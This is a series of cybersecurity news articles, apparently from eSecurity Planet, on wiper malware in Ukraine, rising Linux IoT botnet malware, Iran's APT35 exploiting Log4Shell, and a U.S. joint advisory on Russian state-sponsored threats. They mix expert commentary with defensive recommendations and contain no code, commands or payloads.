In an alert issued this week, the Cybersecurity and Infrastructure Security Agency (CISA) cited a series of cyberattacks perpetrated against public and private Ukrainian organizations as tensions between Ukraine and Russia grow despite talks between U.S. and Russian government leaders.

Government and private entities in Ukraine have been targeted this month by a barrage of malware that has defaced websites and wiped or corrupted data from Windows- and Linux-based systems. Microsoft’s Threat Intelligence Center, in a blog post Jan. 15, outlined the malware operation that began hitting Ukrainian organizations days before.

Malware Designed to Destroy

The malware “is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom,” the Microsoft unit wrote. “Our investigation teams have identified the malware on dozens of impacted systems and that number could grow as our investigation continues. These systems span multiple government, non-profit, and information technology organizations, all based in Ukraine. … It is unlikely these impacted systems represent the full scope of impact as other organizations are reporting.”

Other organizations also have issued reports about data-wiping and other malware being used against groups in the troubled country. Ukraine’s cyber authorities said in a statement that the malware exploited vulnerabilities in the OctoberCMS content management systems and the high-profile Log4j flaw, as well as compromised credentials, to launch the attacks.

Within a couple of days, 95 percent of the Ukrainian government sites impacted by the malware had been restored, they said.

Also read: Top Vulnerability Management Tools

Threats in a Connected World

In light of the attacks and the ongoing geopolitical situation in Ukraine, both CISA and Microsoft urged public and private groups in the United States to use the information to proactively protect their infrastructure against malware attacks that might result from the troubles in that region.

“Public and private entities in Ukraine have suffered a series of malicious cyber incidents, including website defacement and private sector reports of potentially destructive malware on their systems that could result in severe harm to critical functions,” CISA said in its alert. “The identification of destructive malware is particularly alarming given that similar malware has been deployed in the past – e.g., NotPetya and WannaCry ransomware – to cause significant, widespread damage to critical infrastructure.”

No group or nation-state has been accused of the malware attacks in Ukraine, but CISA said cybersecurity and IT staffs should review the detailed document the agency released earlier this month, Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure. They also should check out another government site, StopRansomware.gov, CISA noted.

Also read: Best Incident Response Tools and Software

CISA’s Cybersecurity Checklist

CISA’s alert outlines myriad steps U.S. organizations should take to protect their networks and data from malware attacks, including validating all remote access and instituting multifactor authentication where needed, making sure that software is patched and up-to-date, and ensuring they are prepared to respond to an intrusion.

The steps also include quickly identifying and assessing unusual network behavior, running antivirus and anti-malware solutions on the network and testing backup procedures. CISA also noted the need to test industrial control systems and “if working with Ukrainian organizations, take extra care to monitor, inspect, and isolate traffic from those organizations; closely review access controls for that traffic.”

Chris Gonsalves, vice president of research at Channelnomics, told eSecurity Planet that the CISA alert is part of a larger propaganda campaign by the U.S. government as it pushes back at possible Russian intrusion into Ukraine and looks to ease tension in the region.

“But here’s the thing about propaganda: It can also be true,” Gonsalves said. “Warnings about global climate change are also propaganda. The information is designed to foment a change in the belief or behavior. They’re also factually correct and that’s the same thing here.”

Also read: Best Backup Solutions for Ransomware Protection

Out of the Lab and Into the Wild

The reference to NotPetya and WannaCry – a notorious ransomware from North Korea rather than Russia – makes sense because both were very targeted pieces of malware that eventually got into the wild and affected targets that were beyond what was initially intended. The threat from the malware attacks this month in Ukraine to companies and agencies outside of the region is similar, he said.

As noted in the CISA alert, companies that do business with Ukrainian counterparts may be impacted by a phishing email or other threats that make their way through the Ukraine companies’ networks and to their global partners.

“They called these things computer viruses originally because they behave exactly like biological viruses, and that once they get out of the lab, it’s very difficult to contain where they go and who they infect,” Gonsalves said. “The thing about – and this is wiper malware [being used in Ukraine], but it works the same with ransomware – is that phishing messages get forwarded and partner networks are integrated together and there are hidden credentials between third parties that we’re not aware of. When I attack a utility in the Ukraine, I see that particular network might be connected through supply chain links to some organization in the U.S. that were never my intended target, but that’s just the way internet connections work. It’s not like they are also going to be targeted. They’re collateral damage.”

See also: Best Third-Party Risk Management (TPRM) Tools

Good Security Advice

Once the possible threat is established, the question becomes whether what CISA is telling organizations through the checklist is effective. In this case, it’s essentially a rewording of the NIST CSF, hitting the high notes of delineating, identifying, protecting, detecting and recovering.

“God bless them for staying on message and using their absolute best cybersecurity framework to continue to get people to do the very basic things that they need to do to protect themselves,” Gonsalves said. “All of this information is applicable and proven to be effective.”

Gonsalves also was pleased to see CISA note the need to protect industrial control systems, as infrastructure will be better protected the more the line between those control systems and traditional IT blurs.

Review Security in Light of Pandemic

One point CISA could have raised is that many companies may believe they’ve addressed the items on the checklist, but haven’t done so in light of the COVID-19 pandemic, which widely dispersed much of their workforces.

‘Even on days when Russia is not menacing its neighbors, this is really good advice’

“You have remote access in places you’ve never had it before,” Gonsalves said. “Do you really have a handle on your access management and your credentials the way you did two years ago in this new world order that we’re in, where everybody’s a remote worker and completely decentralized? Yeah, look at this list, but also review it through the lens of the way that you work in the COVID and post-COVID environment, because many of these elements are much more crucial and have changed radically over the last year.”

He also suggested that CISA issue this checklist on a continuous basis.

“You should issue this memo on the first day of every quarter for the rest of our lives,” Gonsalves said. “Even on days when Russia is not menacing its neighbors, this is really good advice.”

Read next: Top Endpoint Detection & Response (EDR) Solutions

The post CISA, Microsoft Warn of Wiper Malware Amid Russia-Ukraine Tensions appeared first on eSecurity Planet.

According to a report by CrowdStrike, there was a 35 percent year-over year growth in 2021 of malware targeting these devices, and the XorDDoS, Mirai and Mozi families were responsible for 22 percent of all Linux-based IoT malware. There was a 10-fold increase in the number of samples of Mozi found in the wild, Mihai Maganu, a threat researcher at CrowdStrike, wrote in a blog post.

The primary goal of all this malware is to compromise the devices and systems, pull them into a botnet and use them for distributed denial-of-services (DDoS) attacks, Maganu wrote. That echoes similar reports that have shown an increase in DDoS attacks worldwide. Kaspersky researchers last year found that such attacks increased by about a third year-over-year in the third quarter 2021.

Microsoft Azure last year said it was able to stave off a record DDoS attack against a European customer.

Also read: Top 8 DDoS Protection Service Providers for 2022

Threats to Open Source, IoT

CrowdStrike’s numbers highlight not only the threat to open-source technologies – see Log4j – but also from IoT devices, long a concern for enterprises as they become more connected and more intelligent.

Linux is widely used in web servers and cloud infrastructure, but the open-source software also is broadly adopted in mobile and IoT devices due to its scalability, performance and security. In addition, the broad array of distributions makes it easier to support multiple hardware designs.

However, with more than 30 billion IoT devices expected to be connected to the internet by 2026, attacks against them can have wide-ranging impacts.

“With various Linux builds and distributions at the heart of cloud infrastructures, mobile and IoT, it presents a massive opportunity for threat actors,” he wrote. “For example, whether using hardcoded credentials, open ports or unpatched vulnerabilities, Linux-running IoT devices are a low-hanging fruit for threat actors — and their en masse compromise can threaten the integrity of critical internet services.”

Also read: Top IoT Security Solutions

A Fast-Growing Attack Surface

Bud Broomhead, CEO of cybersecurity vendor Viakoo, told eSecurity Planet that IoT devices are the largest and fastest-growing attack surface for most organizations and that they have more known vulnerabilities targeting them than traditional IT systems.

There is a litany of reasons for this, Broomhead said. Organizations can have as many as 100 times the number of IoT devices than other systems, agent-based vulnerability remediation solutions don’t work with them but older threat vectors like man-in-the-middle attacks do, and having so many vulnerable IoT devices enables huge botnet armies to be assembled and deployed.

There are other problems, too, including that many IoT devices are managed by line-of-business groups rather than IT and many use non-standard operating systems that traditional IT cybersecurity products don’t work with.

“IoT devices pose two fundamental threats,” he said. “The largest risk is that IoT systems – think water control or pipelines – could be controlled by a threat actor to cause physical damage, loss of life or enable terrorism. Vulnerable IoT devices also pose a threat that they can be used as entry into a network to then laterally move to sensitive corporate data or other systems. Because IoT devices are performing business-critical [and] mission-critical functions, shutting them off is not an option in many cases, making an exploit against them inherently higher risk than IT systems that can be taken offline.”

See also: EU to Force IoT, Wireless Device Makers to Improve Security

Mozi, XorDDoS and Mirai

Mozi is a peer-to-peer (P2P) botnet network that was first detected in 2019 and uses the distributed hash table (DHT) system. There is a distributed and decentralized lookup mechanism in DHT that makes it easy for Mozi to hide communications with a command-and-control (C2) server behind a lot of legitimate DHT traffic.

“The use of DHT is interesting because it allows Mozi to quickly grow a P2P network,” Maganu wrote. “And, because it uses an extension over DHT, it’s not correlated with normal traffic, so detecting the C2 communication becomes difficult. Mozi infects systems by brute-forcing SSH and Telnet ports. It then blocks those ports so that it is not overwritten by other malicious actors or malware.”

CrowdStrike in 2021 also saw a 123 percent year-over-year increase in samples of XorDDoS, a Trojan aimed at multiple Linux architectures, including those powered by x86 chips from Intel and AMD as well as Arm processors. The malware uses SSH brute-force attacks to gain remote control of devices and some variants allow bad actors to scan and search for Docker containers, he wrote.

Mirai, a Linux Trojan that has been around since 2016, is similar to Mozi in that it exploits weak protocols and passwords to compromise devices by using brute-force attacks. Its developer published the source code for Mirai, which ramped up the number of variants, including Sora, IZIH9 and Rekai. All told, identified samples of all three jumped in 2021 from 33 percent for Sora to 83 percent for Rekai.

Sensitive Data an Attractive Target

It’s not surprising that fast-growing IoT devices have become a popular target for threat actors, according to John Bambenek, principal threat hunter at cybersecurity vendor Netenrich.

“Anything that has sensitive data is an attractive target,” Bambenek told eSecurity Planet. “Criminals want to make money. Spies want to steal information. If valuable enough data was stored on a Commodore 64 to make it worth a criminal’s while, they’ll drop a zero-day on that, too. The problem with IoT devices is they have all the functionality of a Linux machine with no ability to put any protection on it.”

Many require firmware updates rather than use such tools as yum or apt for patching, adding that users can’t deploy endpoint protection on most of them.

“IoT devices have made botnets great again,” Bambenek said.

They also can be an avenue into an enterprise’s network and data, he said. In particular, IoT devices that process sensitive information, such as point-of-sale (POS) devices and medical equipment, can be exploited to steal and exfiltrate data.

IoT Protection Steps

Viakoo’s Broomhead said there are three key steps organizations can take to protect themselves from the threat posed by vulnerable IoT devices, including having a complete inventory of IT assets and remediating them for vulnerabilities. In addition, he recommended implementing an automated IoT vulnerability remediation solution to perform security fixes as soon as possible and extending a zero trust initiative to include IoT hardware.

Bambenek first suggestion is to forcefully throw away – to “yeet” – the IoT devices.

“If an organization cannot yeet their unmanaged IoT devices into the abyss, they should put them on isolated network segments and use strong network security tools and IPS to protect those devices and to identify abnormal behavior from them,” he said.

Further reading: Best Patch Management Software

The post Attacks Escalating Against Linux-Based IoT Devices appeared first on eSecurity Planet.

Check Point Software’s researchers said this week that the Iran-backed advanced persistent threat group APT35 is looking to leverage the critical Apache Log4j flaw to distribute a new modular PowerShell-based framework designed for persistence, gathering information, communicating with a command-and-control (C&C) server and executing commands.

APT35 – also known as TA453, Phosphorus and Charming Kitten – was among a number of nation-state supported attack groups that were observed by threat intelligence units with Check Point, Microsoft and other vendors investigating ways to exploit the vulnerability just days after it became public Dec. 9.

“With the emergence of the Log4j security vulnerability, we’ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal,” the Check Point researchers wrote in a blog post this week. “It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems.”

Log4Shell a Significant Threat

The Log4j flaw – which also is known as Log4Shell and is tracked as CVE-2021-44228 – is a significant threat due to the broad enterprise use of Log4j and the huge number of servers and cloud-based services that could be exposed to the zero-day vulnerability. Log4j, a free and widely distributed open-source tool from the Apache Software Foundation, is a logging tool and the flaw impacts version 2.0 through 2.14.1.

Security pros have said that the threat posed by Log4Shell is so high not only because of how far-reaching the tool’s use is but also because of how easily the vulnerability can be exploited. Threat actors only need to send a string that includes the malicious code, which is parsed and logged by Log4j and loaded into a server. Hackers can then gain control of the system running the software, creating a platform for launching their attacks.

A number of patches, detection tools and “vaccines” were released in the weeks after Log4Shell’s disclosure to address the problem. Cybersecurity firm Oxeye this week introduced Ox4Shell, a free open-source payload de-obfuscation tool designed to expose hidden payloads actively used by bad actors to confuse security tools and teams and avoid detection of their Log4Shell attacks. Ox4Shell, which officials said is the first in a series of planned solutions to push back against threats that exploit the Log4j flaw, is available on GitHub.

Also read: How Hackers Use Payloads to Take Over Your Machine

A Long-Term Security Problem

Despite these efforts, industry experts and government officials have said Log4Shell will continue to be a long-term problem. Jen Easterly, director of the federal Cybersecurity and Infrastructure Security Agency (CISA), reportedly said during a press conference that agency officials “expect Log4Shell to be used in intrusions well into the future.”

APT35’s PowerShell-based framework – dubbed CharmPower – is based on JNDI Exploit Kits, which has been removed from GitHub due to its skyrocketing popularity following the Log4Shell disclosure, according to Check Point. Attackers using the framework exploit a system by sending a crafted request to a victim’s public-facing device. Once exploited, the exploitation server creates and sends back a malicious Java class – which runs a PowerShell command – for execution on a vulnerable machine and eventually downloads a PowerShell module.

The module communicates with the C&C server and executes the commands, including validating the network connection and receiving, decrypting and executing follow-up modules, Check Point researchers said.

They wrote that “the actor’s attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on previous infrastructure, which made the attack easier to detect and attribute.”

Also read: Best Incident Response Tools and Software

Government Cybersecurity Efforts

The Biden Administration and other government entities are working to mitigate the threats from Log4Shell and to try to ensure something similar can’t happen again. The White House on Jan. 13 was meeting with a range of tech companies, including Apple, Facebook’s parent company Meta, Microsoft and IBM, as well as federal agencies like Commerce, Defense, Homeland Security and CISA to talk about security and open-source software in the wake of the Log4j vulnerability.

During her meeting with journalists, Easterly said that CISA has been monitoring threat actors for ones trying to exploit Log4Shell and that “over the past several weeks we have seen widespread exploitation of Log4Shell by criminal actors who use it to install cryptomining software on victim computers or to capture victim computers for use in botnets.”

However, she said, “at this time we have not seen the use of Log4Shell resulting in significant intrusions. This may be the case because sophisticated adversaries have already used this vulnerability to exploit targets and are just waiting to leverage their access until network defenders are on lower alert.”

APT35 Efforts Show Real Threat of Flaw

However, Chris Morgan, senior cyberthreat intelligence analyst at digital risk protection solutions vendor Digital Shadows, said Check Point’s detection of APT35’s exploitation of Log4Shell conflicts with what Easterly and other CISA officials said about no significant intrusion being tied to the Log4j flaw.

“This likely emphasizes ongoing issues with incident disclosure and transparency and the lag that can exist between threat actor activity and discovery,” Morgan told eSecurity Planet, adding that as Easterly said, “Log4Shell will undoubtedly be featured heavily in threat actor campaigns for a considerable amount of time and the full scale of impact from Log4Shell will likely not be known for several months.”

He also noted that APT35 used the publicly available JNDI exploit kit that was published on – and since removed from – GitHub, which will probably ramp up debate regarding GitHub’s policy on proof-of-concept (PoC) exploit kits and malware samples hosted on the service.

“Github changed their policy in June 2021 to permit the removal of such items in order to minimize the risk of the exploits being used in live attacks,” Morgan said. “This decision originally was related to the removal of a PoC raised by a security researcher for the ProxyLogon Microsoft Exchange vulnerabilities, which was widely criticized by many in the security community.”

APT35 is a “live example of how a public exploit can fall into the wrong hands quickly,” he said. Check Point’s “findings may prove to be a justification of why their change in policy was a correct decision.”

The researchers wrote that whenever there is a new critical vulnerability published, the InfoSec community “holds its breath until its worst fears come true: scenarios of real-world exploitation, especially by state-sponsored actors. As we showed in this article, the wait in the case of the Log4j vulnerability was only a few days. The combination of its simplicity, and the widespread number of vulnerable devices, made this a very attractive vulnerability for actors such as APT35.”

They also noted that the threat actors used the same or similar infrastructure as in many of their previous attacks, but that given their ability to take advantage of the Log4j vulnerability and “the code pieces of the CharmPower backdoor, the actors are able to change gears rapidly and actively develop different implementations for each stage of their attacks.”

Read next: Top Vulnerability Management Tools

The post Iran-Based APT35 Group Exploits Log4J Flaw appeared first on eSecurity Planet.

The joint cybersecurity advisory issued Jan. 11 by the FBI, National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) comes as tensions rise between Russia, the United States and European countries over Russia’s military activities related to Ukraine. The alert gives companies and agencies an overview of common tactics used by such Russia-based threat groups, lists of vulnerabilities they’ve been known to exploit and steps companies can take to detect, respond to and mitigate an attack.

“Historically, Russian state-sponsored advanced persistent threat (APT) actors have used common but effective tactics – including spearphishing, brute force, and exploiting known vulnerabilities against accounts and networks with weak security – to gain initial access to target networks,” the agencies wrote in the alert. “Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware.”

In addition, such groups have shown they can “maintain persistent, undetected, long-term access in compromised environments – including cloud environments – by using legitimate credentials,” they wrote. “In some cases, Russian state-sponsored cyber operations against critical infrastructure organizations have specifically targeted operational technology (OT)/industrial control systems (ICS) networks with destructive malware.”

Also read: Critical Infrastructure Protection: Physical and Cyber Security Both Matter

Russian Groups Behind High-Profile Attacks

Russian-backed groups have been behind some of the most significant recent cyberattacks, including the SolarWinds breach (Nobelium) and the ransomware attacks on Colonial Pipeline (DarkSide) and global meat supplier JBS (REvil).

Government agencies and the Biden administration also have taken steps to push back against Russia and the cybercriminal groups it’s accused of supporting. President Biden in July called on Russian President Vladimir Putin to stem ransomware and other cyberattacks from these gangs. In addition, the administration has taken other actions, from working with U.S. companies on their security posture to putting bounties on the more active and notorious threat actors.

Despite all this, the threat of the Russian gangs continues to hang over the United States and is unlikely to disappear anytime soon, according to Erich Kron, security awareness advocate at security training firm KnowBe4.

“Targeting critical infrastructure is nothing new,” Kron told eSecurity Planet. “However, the increased attacks are certainly something to be concerned with, especially given the tensions between the U.S. and Russia over the Ukraine border crisis. Russia has very advanced cyber warfare skills which keep them hidden once a network is compromised, although ironically, the initial attack vectors are typically those of low-tech email phishing campaigns, taking advantage of people reusing already compromised passwords or using easily guessed passwords.”

Also read: Best Password Managers & Tools

Tactics and Responses

In their alert, the agencies laid out a range of tactics used by the Russian-supported groups, including using large-scale scans to find vulnerable servers, compromising third-party software (like SolarWinds’ Orion software), password-guessing and password-spraying efforts and leveraging the credentials of existing accounts to ensure long-term and persistent access to compromised networks.

In addition, the agencies also outlined a number of steps to detect and protect against such attacks. Detection is critical, given the APT actors’ capabilities to maintain a long-term presence in compromised enterprise and cloud environments. They urged companies to implement strong and centralized log collection and retention programs and  look for behavioral evidence or network- and host-based artifacts related to known Russian ATP groups. This would include detecting password spray activity, checking authentication logs for system and application login failures of valid accounts, and detecting the use of compromised credentials.

There also was a list of responses companies should take if they’ve been compromised, including isolating affected systems and maintaining and securing backups. For mitigation, the recommendations include being prepared for such an attack, creating and maintaining cyber incident responses and resiliency plans and enhancing the security posture with tools like identity and access management (IAM) software and vulnerability and configuration solutions.

See also: Best Incident Response Tools and Software

Know the Enemy

The agencies also urged U.S. companies to become familiar with the tactics and targets of these ATP groups.

“It’s important to remind ourselves that critical infrastructure is more than just a phrase,” Tim Erlin, vice president of strategy for cybersecurity firm Tripwire, told eSecurity Planet. “It describes a vast cross-section of infrastructure on which our nation relies. Critical infrastructure really is critical.”

The agencies’ alert contains both information about the threat and actionable information companies can use to protect themselves, such as the use of the MITRE ATT&CK framework for identifying malicious activity and mapping mitigation actions, Erlin said. “Identifying the attack in progress is important, but preventing the attack from being successful at all is better,” he said.

Also read: Best Ransomware Removal and Recovery Services

The Importance of Logs

Rick Holland, CISO and vice president of strategy at cybersecurity vendor Digital Shadows, told eSecurity Planet that a key message from the alert is the use of logs. When defending against any cybercriminal group, “you must have a security monitoring infrastructure that provides situational awareness to detect and respond to intrusions,” he said. “You must have sensors in place to capture malicious activity. You must also retain those logs for retroactive threat hunting as you develop and acquire new intelligence.”

It was also important for the alert to list the tactics used by the ATP groups, Holland said.

“Although these groups have sophisticated capabilities, [such as the] SolarWinds intrusion, they also rely on low-hanging fruit tactics and techniques,” he said. “While it isn’t sexy, effective security hygiene like patching known vulnerabilities on external services raises the advisory costs and makes their job harder. Don’t be a soft target.”

See also: Best SIEM Tools & Software

Geopolitical Tensions

Holland echoed KnowBe4’s Kron regarding the threat of increased activity stemming from the tensions around Russia’s activities with Ukraine. Should the conflict escalate, the Russian-supported bad actors could also increase their operations.

“Cyberspace has become a key component of geopolitics,” he said. “Russian APT groups aren’t at the top of the threat model for all companies, unlike the critical infrastructure providers mentioned in the alert, but could end up being collateral damage.”

A Familiar Threat

Some cybersecurity professionals said the agencies’ security alert does little more than remind companies about the threat and to deliver information that they already should know.

Tim Wade, technical director and CTO at cybersecurity firm Vectra, told eSecurity Planet that he couldn’t “recall a time in my life when Russia wasn’t aggressively probing western resolve, ranging from tactical incursions into air space to pulling strategic economic levers. This activity is just a continuation of that long-standing tradition, and I read this advisory as another periodic reminder of the background radiation of global politics – if you’re operating critical infrastructure and are under the impression that you aren’t squarely in an operator’s crosshairs, you’re wrong.”

Tim Helming, security evangelist at threat intelligence company DomainTools, said the guidance in the alert is good, but that “it’s tempting to look at it as motherhood-and-apple-pie. The vast majority of owners and operators of critical infrastructure are well aware of the threats and are also cognizant of many of the fundamental steps toward hardening their assets against these threats. Many in the critical infrastructure community take an ‘assume breach.’”

Most companies and agencies already are using and improving the procedures and tools outlined in the alert, Helming told eSecurity Planet. CISA, the FBI and NSA likely issued the alert in part “because if they weren’t on record doing so and a compromise were confirmed, it would have been a glaring gap. It also gives owners and operators facing resource constraints more support in their requests and it’s important not to underestimate how important that can be.”

Further reading: Cybersecurity Outlook 2022: Third-Party, Ransomware and AI Attacks Will Get Worse

The post U.S. Security Agencies Warn About Russian Threat Gangs Amid Ukraine Tensions appeared first on eSecurity Planet.